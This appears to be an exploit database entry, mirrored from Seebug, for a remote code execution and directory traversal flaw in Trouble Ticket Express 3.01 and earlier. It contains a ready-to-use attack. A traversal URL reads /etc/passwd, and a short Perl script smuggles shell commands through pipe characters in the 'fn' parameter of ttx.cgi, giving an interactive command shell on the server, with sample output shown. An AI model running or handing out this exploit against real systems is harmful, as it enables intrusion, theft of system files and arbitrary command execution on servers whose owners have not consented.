Lucene search
K

Trouble Ticket Express <= 3.01 Remote Code Execution/Directory Traversal

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 22 Views

Trouble Ticket Express <= 3.01 Remote Code Execut/Dir Traversa

Code

                                                # Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
# Author: zombiefx &#60;[email protected]&#60;mailto:[email protected]&#62;&#62;
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
# Version: v3.01,v3.0,v2.24,v2.21
# Tested on: Linux
# CVE :
# Code:

# This is only possible if an attachment input is available.
# Directory Traversal Vuln is
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
# Simple perl code to run commands on the box
# $ id
# uid=0(httpd) gid=0(httpd) groups=0(httpd)
# $ whoami
# httpd

#!/usr/bin/perl
use warnings;
use strict;
use LWP::Simple;
my $url = &#39;http://localhost/cgi-bin/ttx.cgi&#39;;
print &#39;$ &#39;;
while (&#60;&#62;) {
    print get( $url . &#39;?cmd=file&fn=|&#39; . $_ . &#39;|&#39; );
    print &#39;$ &#39;;
}
&#60;mailto:[email protected]&#62;


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
22